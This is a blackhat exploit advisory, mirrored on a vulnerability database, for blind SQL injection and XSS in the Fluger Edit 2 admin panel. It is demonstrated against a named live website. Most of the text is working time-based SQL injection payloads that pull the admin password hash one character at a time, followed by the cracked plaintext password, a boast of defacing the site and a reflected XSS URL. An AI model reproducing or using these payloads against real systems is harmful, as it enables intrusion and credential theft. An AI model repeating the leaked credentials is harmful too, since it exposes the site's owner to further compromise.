Vulners
Lucene search
Fluger Edit 2 Blind SQL Injection / Cross Site Scripting Vulnerability
=====================================================
Vulnerable Software: Fluger Edit v.2 || administration software
Vendor: http://www.fluger.com/
Software License: Commercial
Vulnerabilities: Blind SQL Injection And XSS
Tested: In Wild
=====================================================
Dork :
Designed and developed by Fluger IT
All right reserved © | 2004 - 2012
************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************
======================================================
FULLY disclosured Real Exploitation examples:
GPC MUST BE=OFF
Theris Blind SQLi vulnerability on login page:
http://www.artclima.am/edit/ <===(Admin panel)
Vulnerable scenario is exist here: http://www.artclima.am/edit/config_secure/verify.php
(Sorry i have no access to source code)
CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png
Due authentication mechanism you can't bypass login form by sending:
'or''='
Instead of you can use Time Based Way to obtain logins:password from admin table.
Here we go:
Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png
http://www.artclima.am/edit/index.php?error
Headers:
Host: www.artclima.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=:$
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
POST DATA:
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
*REPLAY*
loginde Blind varidir.
Bypass getmir.
Time Based RuleZ!
www.artclima.am/edit/index.php?error
columnlar:
user
password
table: admin
=========================================
1 user var:
//TRUE
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir
cekek logini
login: admin
//TRUE
username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir
parolu cekek:
=========================================
1-ci simvol: e
username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
2-ci simvol: 0
username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
3-cu simvol: 4
username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
4-cu simvol: 4
username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
5-ci simvol: 6
username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
6-ci simvol: 5
username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
7-ci simvol: 0
username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
8-ci simvol: a
username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
9-cu simvol: 5
username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
10-cu simvol: 6
username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
11-ci simvol: 7
username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
12-ci simvol: e
username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
13-cu simvol: d
username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
yoxla sonra
=========================================
14-cu simvol: 2
username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
15-ci simvol: b
username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
16-ci simvol: 2
username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
17-ci simvol: d
username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
18-ci simvol: 0
username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
19-cu simvol: 4
username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
20-ci simvol: 3
username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
21-ci simvol: 0
username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
22-ci simvol: 3
username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
23-cu simvol: e
username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
24-cu simvol: 3
username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
25-ci simvol: 7
username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
26-ci simvol: 9
username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
27-ci simvol: 3
username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
28-ci simvol: d
username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
29-cu simvol: f
username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
30-cu simvol: d
username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
31-ci simvol: 9
username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
32-ci simvol: 5
username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
Verification: +
//TRUE
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
MD5: e044650a567ed2b2d04303e3793dfd95
Resolves to: price777
Sure! I will "rm"-it too with great pleasure!
Rmned: http://zone-h.org/mirror/id/18295382
Second way: Session Hijack to gain access to admin panel:
XSS:
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1
Print Screen:
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png
From source code of page:
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">
<tr valign="top">
<td class="bg_content">
<div id="printarea">
<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">
<tr>
<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>
<td>&nbps;</td>
</tr>
</table>
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >
==========================THE END=========================
/AkaStep
# 0day.today [2018-03-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Sep 2012 00:00Current
7.1High risk
Vulners AI Score7.1